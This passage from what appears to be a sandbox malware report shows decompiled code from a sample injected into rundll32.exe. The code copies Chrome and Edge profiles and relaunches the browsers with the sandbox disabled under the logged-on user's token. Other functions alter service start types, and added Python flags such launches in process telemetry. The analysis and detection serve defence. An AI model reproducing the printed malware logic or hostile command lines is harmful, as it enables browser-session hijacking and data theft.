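def scan_reg_export(text: str) -> List[Tuple[str, str, int]]:
    return find_suspicious_clsid_values(parse_reg_export(text))


if __name__ == '__main__':
    for key, name, size in scan_reg_export(SAMPLE_REG_EXPORT):
        print(f'{key}  value "{name}"  REG_BINARY, {size} bytes')
```

On a live host, `reg export HKLM\SOFTWARE\Classes\CLSID clsid.reg /y` writes UTF-16LE with a BOM, so open the file with encoding='utf-16' before passing it to scan_reg_export. The code here is 32-bit and the snapshot came from a rundll32.exe process; if that host is a 32-bit process on 64-bit Windows, WOW64 redirection places the write under HKLM\SOFTWARE\Classes\Wow6432Node\CLSID, which is why both roots are checked. Export both. The payload lengths are reported rather than decoded, since the transformation E046454D0 applies is not resolved in this listing.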

                                                            C-Code - Quality: 57%
                                                            			E04636880(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v12;
                                                            				short _v536;
                                                            				short _v1056;
                                                            				char _v1060;
                                                            				char _v1076;
                                                            				signed int _t18;
                                                            				void* _t20;
                                                            				void* _t48;
                                                            				signed int _t50;
                                                            
                                                            				_t18 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t18 ^ _t50;
                                                            				_t48 = __ecx;
                                                             				_v1060 = 0x104; // MAX_PATH, in WCHARs
                                                             				_t20 = E04647240( &_v536,  &_v1060, __eflags); // resolves the logged-on user's profile directory into _v536; the subcall uses Wtsapi32!WTSQueryUserToken, which needs SeTcbPrivilege, so the code expects to run as LocalSystem outside the user's session
                                                             				_t56 = _t20;
                                                             				if(_t20 == 0) {
                                                             					__eflags = _v12 ^ _t50;
                                                             					return E04655AFE(_v12 ^ _t50);
                                                             				} else {
                                                             					lstrcatW( &_v536, L"\\AppData\\Local\\Google\\Chrome\\User Data"); // the real Chrome profile root
                                                             					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70))); // copy target: the real path plus a suffix taken from the config object, i.e. a sibling directory
                                                             					L046473D0(__ebx,  &_v536,  &_v1056, _t48, __esi); // recursive directory copy (CreateDirectoryW, FindFirstFileW and two lstrcmpW checks in the subcall APIs, consistent with skipping "." and "..")
                                                             					wsprintfW( &_v536, L"cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056); // launch Chrome on the copied profile with the sandbox disabled
                                                             					asm("xorps xmm0, xmm0");
                                                             					asm("movups [ebp-0x430], xmm0"); // zero the 16-byte PROCESS_INFORMATION at _v1076
                                                             					_push( &_v1076); // lpProcessInformation
                                                             					_push( &_v536); // command line
                                                             					E046472E0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56); // CreateProcessAsUserW with the WTSQueryUserToken token (0x400 = CREATE_UNICODE_ENVIRONMENT, cb = 0x44): the browser runs in the user's session
                                                            					return E04655AFE(_v12 ^ _t50,  &_v536);
                                                            				}
                                                            			}

                                                             Instruction addresses: 0x04636889, 0x04636890, 0x04636894, 0x04636896, 0x046368ac, 0x046368b1, 0x046368b3, 0x04636951, 0x0463695c, 0x046368b9, 0x046368c5, 0x046368e1, 0x046368f3, 0x0463690b, 0x0463691d, 0x04636920, 0x04636927, 0x04636931, 0x04636933, 0x04636949, 0x04636949

                                                            APIs
                                                              • Part of subcall function 04647240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,046368B1), ref: 04647269
                                                              • Part of subcall function 04647240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647279
                                                              • Part of subcall function 04647240: CloseHandle.KERNEL32(?,?,?,?,046368B1), ref: 046472A0
                                                            • lstrcatW.KERNEL32(?,\AppData\Local\Google\Chrome\User Data), ref: 046368C5
                                                            • wsprintfW.USER32 ref: 046368E1
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 04647414
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467F170), ref: 0464742C
                                                              • Part of subcall function 046473D0: CreateDirectoryW.KERNEL32(?,00000000), ref: 04647431
                                                              • Part of subcall function 046473D0: GetLastError.KERNEL32 ref: 04647441
                                                              • Part of subcall function 046473D0: FindFirstFileW.KERNEL32(?,?), ref: 0464745C
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 046474A3
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467D92C), ref: 046474B5
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,?), ref: 046474C5
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 046474EA
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467D92C), ref: 046474FC
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,?), ref: 0464750C
                                                              • Part of subcall function 046473D0: lstrcmpW.KERNEL32(?,0467D940), ref: 04647523
                                                              • Part of subcall function 046473D0: lstrcmpW.KERNEL32(?,0467D944), ref: 04647535
                                                            • wsprintfW.USER32 ref: 0463690B
                                                              • Part of subcall function 046472E0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04647329
                                                              • Part of subcall function 046472E0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647339
                                                              • Part of subcall function 046472E0: CreateProcessAsUserW.ADVAPI32(?,00000000,04636938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04647386
                                                            Strings
                                                            • \AppData\Local\Google\Chrome\User Data, xrefs: 046368B9
                                                            • %s%s, xrefs: 046368DB
                                                            • cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 04636905
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$AddressCreateLibraryLoadProclstrcmpwsprintf$CloseDirectoryErrorFileFindFirstHandleLastProcessUser
                                                            • String ID: %s%s$\AppData\Local\Google\Chrome\User Data$cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                            • API String ID: 3549361973-1696747008
                                                            • Opcode ID: 6861a1d45b994fecaad458607889166c7d2dd3e9be50235a70eb823fc2404839
                                                            • Instruction ID: acc4ff5d8616981b166369ff5fa490e7be8cb8f33343c24f6d911f5b093a19f7
                                                            • Opcode Fuzzy Hash: 6861a1d45b994fecaad458607889166c7d2dd3e9be50235a70eb823fc2404839
                                                            • Instruction Fuzzy Hash: B22166B1A4011D9BCB10EB74DC899DAB3BCEF54304F4045E5A509A3141FB70AA95CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
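E04636880 copies the victim's Chrome profile to a sibling directory and starts chrome.exe on the copy through `cmd.exe /c start`, with the renderer sandbox disabled, as the logged-on user (CreateProcessAsUserW with a WTSQueryUserToken token); E04636960 below does the same for msedge.exe. The combination is visible in process-creation telemetry: a browser with `--no-sandbox --allow-no-sandbox-job` and a `--user-data-dir` that is not the default profile but shares its prefix, spawned via cmd.exe from a non-shell parent (rundll32.exe in this snapshot). The Python below is an added example, not part of the Joe Sandbox report or of the sample. It scores Sysmon-style events for that pattern and covers both browsers; the events are constructed, and the "User Data_x" suffix is hypothetical, since the real suffix comes from the sample's config object and is not visible here.

```python
from typing import Dict, List, Tuple

# Default profile roots (relative to the user profile, lower-cased) for the two browsers the
# sample targets in E04636880 (chrome.exe) and E04636960 (msedge.exe).
BROWSER_DEFAULT_PROFILE = {
    'chrome.exe': r'\appdata\local\google\chrome\user data',
    'msedge.exe': r'\appdata\local\microsoft\edge\user data',
}
SANDBOX_DISABLING_FLAGS = {'--no-sandbox', '--allow-no-sandbox-job'}
INTERACTIVE_SHELLS = {'explorer.exe'}

# Constructed process-creation events in a Sysmon-like shape (not from the report). The
# "User Data_x" suffix is hypothetical: the sample appends a suffix read from its config object.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {'Image': r'C:\Windows\System32\cmd.exe',
     'ParentImage': r'C:\Windows\System32\rundll32.exe',
     'CommandLine': r'cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis '
                    r'--disable-gpu --disable-d3d11 --user-data-dir="C:\Users\alice\AppData\Local\Google\Chrome\User Data_x"'},
    {'Image': r'C:\Program Files\Google\Chrome\Application\chrome.exe',
     'ParentImage': r'C:\Windows\System32\cmd.exe',
     'CommandLine': r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-sandbox --allow-no-sandbox-job '
                    r'--disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="C:\Users\alice\AppData\Local\Google\Chrome\User Data_x"'},
    {'Image': r'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe',
     'ParentImage': r'C:\Windows\explorer.exe',
     'CommandLine': r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default'},
    {'Image': r'C:\Program Files\Google\Chrome\Application\chrome.exe',
     'ParentImage': r'C:\Python311\python.exe',
     'CommandLine': r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9222 '
                    r'--user-data-dir=C:\Temp\selenium_profile'},
]


def _basename(path: str) -> str:
    return path.replace('/', '\\').rsplit('\\', 1)[-1]


def tokenize_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring double quotes.
    Sufficient for browser launch lines; it is not a full CommandLineToArgvW."""
    tokens, current, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if current:
                tokens.append(''.join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append(''.join(current))
    return tokens


def score_browser_launch(event: Dict[str, str]) -> Tuple[int, List[str]]:
    """Score one process-creation event; works on both the cmd.exe line and the browser line."""
    tokens = [t.lower() for t in tokenize_cmdline(event['CommandLine'])]
    browser_idx = next((i for i, t in enumerate(tokens) if _basename(t) in BROWSER_DEFAULT_PROFILE), None)
    if browser_idx is None:
        return 0, []
    browser = _basename(tokens[browser_idx])
    flags = tokens[browser_idx + 1:]
    score, reasons = 0, []

    disabling = SANDBOX_DISABLING_FLAGS.intersection(flags)
    if disabling:
        score += len(disabling)
        reasons.append('sandbox disabled: ' + ' '.join(sorted(disabling)))

    user_data_dir = next((f.split('=', 1)[1].rstrip('\\') for f in flags if f.startswith('--user-data-dir=')), None)
    if user_data_dir is not None:
        default = BROWSER_DEFAULT_PROFILE[browser]
        if not user_data_dir.endswith(default):
            score += 2
            reasons.append('non-default --user-data-dir ' + user_data_dir)
            if default in user_data_dir:  # "%s%s": the real path plus a suffix
                score += 1
                reasons.append('profile directory is a sibling copy of the real profile')

    if 'start' in tokens[:browser_idx]:
        score += 1
        reasons.append('browser started indirectly via "cmd.exe /c start"')

    if _basename(event.get('ParentImage', '').lower()) not in INTERACTIVE_SHELLS:
        score += 1
        reasons.append('parent is not the interactive shell: ' + event.get('ParentImage', '?'))
    return score, reasons


def detect_hidden_browser_launches(events: List[Dict[str, str]], threshold: int = 5) -> List[Tuple[str, int, List[str]]]:
    hits = []
    for event in events:
        score, reasons = score_browser_launch(event)
        if score >= threshold:
            hits.append((event['Image'], score, reasons))
    return hits


if __name__ == '__main__':
    for image, score, reasons in detect_hidden_browser_launches(SAMPLE_EVENTS):
        print(f'{score:2d}  {image}\n      ' + '\n      '.join(reasons))
```

The two sandbox-disabling switches are the discriminating signal; a bare non-default `--user-data-dir` (Selenium, kiosk builds, portable profiles) scores 3 at most and stays below the threshold, and the fourth constructed event shows that case. Because the sample uses CreateProcessAsUserW with the interactive user's token, the browser runs under the victim's account while its parent chain leads back to the process hosting the injected code, so the parent check carries weight even when the command line is partly redacted.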

                                                            C-Code - Quality: 57%
                                                            			E04636960(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v12;
                                                            				short _v536;
                                                            				short _v1056;
                                                            				char _v1060;
                                                            				char _v1076;
                                                            				signed int _t18;
                                                            				void* _t20;
                                                            				void* _t48;
                                                            				signed int _t50;
                                                            
                                                            				_t18 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t18 ^ _t50;
                                                            				_t48 = __ecx;
                                                            				_v1060 = 0x104;
                                                            				_t20 = E04647240( &_v536,  &_v1060, __eflags);
                                                            				_t56 = _t20;
                                                            				if(_t20 == 0) {
                                                            					__eflags = _v12 ^ _t50;
                                                            					return E04655AFE(_v12 ^ _t50);
                                                            				} else {
                                                            					lstrcatW( &_v536, L"\\AppData\\Local\\Microsoft\\Edge\\User Data");
                                                            					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
                                                            					L046473D0(__ebx,  &_v536,  &_v1056, _t48, __esi);
                                                            					wsprintfW( &_v536, L"cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movups [ebp-0x430], xmm0");
                                                            					_push( &_v1076);
                                                            					_push( &_v536);
                                                            					E046472E0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
                                                            					return E04655AFE(_v12 ^ _t50,  &_v536);
                                                            				}
                                                            			}

                                                            0x04636969
                                                            0x04636970
                                                            0x04636974
                                                            0x04636976
                                                            0x0463698c
                                                            0x04636991
                                                            0x04636993
                                                            0x04636a31
                                                            0x04636a3c
                                                            0x04636999
                                                            0x046369a5
                                                            0x046369c1
                                                            0x046369d3
                                                            0x046369eb
                                                            0x046369fd
                                                            0x04636a00
                                                            0x04636a07
                                                            0x04636a11
                                                            0x04636a13
                                                            0x04636a29
                                                            0x04636a29

                                                            APIs
                                                              • Part of subcall function 04647240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,046368B1), ref: 04647269
                                                              • Part of subcall function 04647240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647279
                                                              • Part of subcall function 04647240: CloseHandle.KERNEL32(?,?,?,?,046368B1), ref: 046472A0
                                                            • lstrcatW.KERNEL32(?,\AppData\Local\Microsoft\Edge\User Data), ref: 046369A5
                                                            • wsprintfW.USER32 ref: 046369C1
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 04647414
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467F170), ref: 0464742C
                                                              • Part of subcall function 046473D0: CreateDirectoryW.KERNEL32(?,00000000), ref: 04647431
                                                              • Part of subcall function 046473D0: GetLastError.KERNEL32 ref: 04647441
                                                              • Part of subcall function 046473D0: FindFirstFileW.KERNEL32(?,?), ref: 0464745C
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 046474A3
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467D92C), ref: 046474B5
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,?), ref: 046474C5
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 046474EA
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467D92C), ref: 046474FC
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,?), ref: 0464750C
                                                              • Part of subcall function 046473D0: lstrcmpW.KERNEL32(?,0467D940), ref: 04647523
                                                              • Part of subcall function 046473D0: lstrcmpW.KERNEL32(?,0467D944), ref: 04647535
                                                            • wsprintfW.USER32 ref: 046369EB
                                                              • Part of subcall function 046472E0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04647329
                                                              • Part of subcall function 046472E0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647339
                                                              • Part of subcall function 046472E0: CreateProcessAsUserW.ADVAPI32(?,00000000,04636938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04647386
                                                            Strings
                                                            • \AppData\Local\Microsoft\Edge\User Data, xrefs: 04636999
                                                            • cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 046369E5
                                                            • %s%s, xrefs: 046369BB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$AddressCreateLibraryLoadProclstrcmpwsprintf$CloseDirectoryErrorFileFindFirstHandleLastProcessUser
                                                            • String ID: %s%s$\AppData\Local\Microsoft\Edge\User Data$cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                            • API String ID: 3549361973-1065409233
                                                            • Opcode ID: 2c2b6f6609bf1a819b4fb12dbb4d7504a32defe15a6d3e4951ca6387515e146c
                                                            • Instruction ID: 940702beeefc11b7873faba7b0491fa7a220493cd53563dc954b6fc1cebf078a
                                                            • Opcode Fuzzy Hash: 2c2b6f6609bf1a819b4fb12dbb4d7504a32defe15a6d3e4951ca6387515e146c
                                                            • Instruction Fuzzy Hash: 392196B194011D57CB10EB74DC889DAB7BCEF54304F4045E6A509A3141FB70AA95CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E0465E651(void* __ecx) {
                                                            				void* _t4;
                                                            				void* _t11;
                                                            				void* _t16;
                                                            				long _t25;
                                                            				void* _t28;
                                                            
                                                            				if( *0x4684010 != 0xffffffff) {
                                                            					_t25 = GetLastError();
                                                            					_t11 = E0465E94E(__eflags,  *0x4684010);
                                                            					__eflags = _t11 - 0xffffffff;
                                                            					if(_t11 == 0xffffffff) {
                                                            						L5:
                                                            						_t11 = 0;
                                                            					} else {
                                                            						__eflags = _t11;
                                                            						if(__eflags == 0) {
                                                            							_t4 = E0465E988(__eflags,  *0x4684010, 0xffffffff);
                                                            							_pop(_t16);
                                                            							__eflags = _t4;
                                                            							if(_t4 != 0) {
                                                            								_t28 = E04668535(_t16, 1, 0x28);
                                                            								__eflags = _t28;
                                                            								if(__eflags == 0) {
                                                            									L8:
                                                            									_t11 = 0;
                                                            									E0465E988(__eflags,  *0x4684010, 0);
                                                            								} else {
                                                            									__eflags = E0465E988(__eflags,  *0x4684010, _t28);
                                                            									if(__eflags != 0) {
                                                            										_t11 = _t28;
                                                            										_t28 = 0;
                                                            										__eflags = 0;
                                                            									} else {
                                                            										goto L8;
                                                            									}
                                                            								}
                                                            								E046684AD(_t28);
                                                            							} else {
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            					}
                                                            					SetLastError(_t25);
                                                            					return _t11;
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}

                                                            0x0465e658
                                                            0x0465e66b
                                                            0x0465e672
                                                            0x0465e675
                                                            0x0465e678
                                                            0x0465e691
                                                            0x0465e691
                                                            0x0465e67a
                                                            0x0465e67a
                                                            0x0465e67c
                                                            0x0465e686
                                                            0x0465e68c
                                                            0x0465e68d
                                                            0x0465e68f
                                                            0x0465e69f
                                                            0x0465e6a3
                                                            0x0465e6a5
                                                            0x0465e6b9
                                                            0x0465e6b9
                                                            0x0465e6c2
                                                            0x0465e6a7
                                                            0x0465e6b5
                                                            0x0465e6b7
                                                            0x0465e6cb
                                                            0x0465e6cd
                                                            0x0465e6cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0465e6b7
                                                            0x0465e6d0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0465e68f
                                                            0x0465e67c
                                                            0x0465e6d8
                                                            0x0465e6e2
                                                            0x0465e65a
                                                            0x0465e65c
                                                            0x0465e65c

                                                            APIs
                                                            • GetLastError.KERNEL32(00000001,?,0465DBC5,04655C3D,046560E1,?,046562F1,?,00000001,?,?,00000001,?,046815F0,0000000C,046563DA), ref: 0465E65F
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0465E66D
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0465E686
                                                            • SetLastError.KERNEL32(00000000,046562F1,?,00000001,?,?,00000001,?,046815F0,0000000C,046563DA,?,00000001,?), ref: 0465E6D8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 9ed027affa9c532a43ec5a20b6034881a1758ffba44e154943a524fd564eeada
                                                            • Instruction ID: a9d736a6e739f98f9f3db54e5fd57c3418177a2010d7e74e3a64b2f96f9e97d6
                                                            • Opcode Fuzzy Hash: 9ed027affa9c532a43ec5a20b6034881a1758ffba44e154943a524fd564eeada
                                                            • Instruction Fuzzy Hash: 57019E323192126EBF242BB4FC84A672B89EB112B9F30032EE964851F1FF576D026194
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E04643870(short* __ecx) {
                                                            				void* _v8;
                                                            				void* _t7;
                                                            				short* _t12;
                                                            				void* _t14;
                                                            				int _t17;
                                                            				void* _t20;
                                                            
                                                            				_push(__ecx);
                                                            				_t17 = 0;
                                                            				_t12 = __ecx;
                                                            				_t20 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t20 != 0) {
                                                            					_t14 = OpenServiceW(_t20, _t12, 0xf01ff);
                                                            					if(_t14 != 0) {
                                                            						_t7 = LockServiceDatabase(_t20);
                                                            						_v8 = _t7;
                                                            						if(_t7 != 0) {
                                                            							_t17 = ChangeServiceConfigW(_t14, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                            							UnlockServiceDatabase(_v8);
                                                            						}
                                                            						CloseServiceHandle(_t14);
                                                            					}
                                                            					CloseServiceHandle(_t20);
                                                            				}
                                                            				return _t17;
                                                            			}

                                                            0x04643873
                                                            0x0464387c
                                                            0x0464387e
                                                            0x04643888
                                                            0x0464388c
                                                            0x0464389b
                                                            0x0464389f
                                                            0x046438a2
                                                            0x046438a8
                                                            0x046438ad
                                                            0x046438c6
                                                            0x046438c8
                                                            0x046438c8
                                                            0x046438cf
                                                            0x046438cf
                                                            0x046438d6
                                                            0x046438d6
                                                            0x046438e4

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04643BAF), ref: 04643882
                                                            • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BAF), ref: 04643895
                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 046438A2
                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 046438BD
                                                            • UnlockServiceDatabase.ADVAPI32(?), ref: 046438C8
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BAF), ref: 046438CF
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BAF), ref: 046438D6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                            • String ID:
                                                            • API String ID: 2762133943-0
                                                            • Opcode ID: ee08e21f579623f20d23adbe48e64373e4e095dfb289068de6c221c1de7bab7a
                                                            • Instruction ID: 9aafd10e3fcdb1560cdd346c851b17c047feefc9cf510b7035783f9011365e98
                                                            • Opcode Fuzzy Hash: ee08e21f579623f20d23adbe48e64373e4e095dfb289068de6c221c1de7bab7a
                                                            • Instruction Fuzzy Hash: 88F0C232301315BB871517B6AC4CE6BBE7CEBC67B27001229FE15D2382FE688C008660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046438F0(short* __ecx) {
                                                            				void* _v8;
                                                            				void* _t7;
                                                            				short* _t12;
                                                            				void* _t14;
                                                            				int _t17;
                                                            				void* _t20;
                                                            
                                                            				_push(__ecx);
                                                            				_t17 = 0;
                                                            				_t12 = __ecx;
                                                            				_t20 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t20 != 0) {
                                                            					_t14 = OpenServiceW(_t20, _t12, 0xf01ff);
                                                            					if(_t14 != 0) {
                                                            						_t7 = LockServiceDatabase(_t20);
                                                            						_v8 = _t7;
                                                            						if(_t7 != 0) {
                                                            							_t17 = ChangeServiceConfigW(_t14, 0xffffffff, 3, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                            							UnlockServiceDatabase(_v8);
                                                            						}
                                                            						CloseServiceHandle(_t14);
                                                            					}
                                                            					CloseServiceHandle(_t20);
                                                            				}
                                                            				return _t17;
                                                            			}

                                                            0x046438f3
                                                            0x046438fc
                                                            0x046438fe
                                                            0x04643908
                                                            0x0464390c
                                                            0x0464391b
                                                            0x0464391f
                                                            0x04643922
                                                            0x04643928
                                                            0x0464392d
                                                            0x04643946
                                                            0x04643948
                                                            0x04643948
                                                            0x0464394f
                                                            0x0464394f
                                                            0x04643956
                                                            0x04643956
                                                            0x04643964

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04643BB8), ref: 04643902
                                                            • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BB8), ref: 04643915
                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 04643922
                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 0464393D
                                                            • UnlockServiceDatabase.ADVAPI32(?), ref: 04643948
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BB8), ref: 0464394F
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04643BB8), ref: 04643956
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                            • String ID:
                                                            • API String ID: 2762133943-0
                                                            • Opcode ID: 740e7fc62c428f2fa745f3723ba0f92db55e834b0d9a6043e230bb108f64441f
                                                            • Instruction ID: 2465cfbbab91bbbd1ffcf629f8da64def6583bef306f3e9a507127e74194e59e
                                                            • Opcode Fuzzy Hash: 740e7fc62c428f2fa745f3723ba0f92db55e834b0d9a6043e230bb108f64441f
                                                            • Instruction Fuzzy Hash: 04F06232705316BB971517B6AC4CE6B7EBCEBC67A27101268FE15D2382FE688D408660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04651D50(void* __ecx, intOrPtr _a4) {
                                                            				struct _CRITICAL_SECTION* _t20;
                                                            				void* _t24;
                                                            
                                                            				_t24 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x24)) == 2) {
                                                            					_t20 = __ecx + 0x28;
                                                            					if(TryEnterCriticalSection(_t20) == 0) {
                                                            						L8:
                                                            						return 1;
                                                            					} else {
                                                            						if( *((intOrPtr*)(_t24 + 0x24)) == 2) {
                                                            							if(_a4 == 0) {
                                                            								E04651100( *((intOrPtr*)(_t24 + 0x40)), timeGetTime());
                                                            								LeaveCriticalSection(_t20);
                                                            								goto L8;
                                                            							} else {
                                                            								L04650B00( *((intOrPtr*)(_t24 + 0x40)));
                                                            								LeaveCriticalSection(_t20);
                                                            								return 1;
                                                            							}
                                                            						} else {
                                                            							SetLastError(0x139f);
                                                            							LeaveCriticalSection(_t20);
                                                            							return 0;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					SetLastError(0x139f);
                                                            					return 0;
                                                            				}
                                                            			}

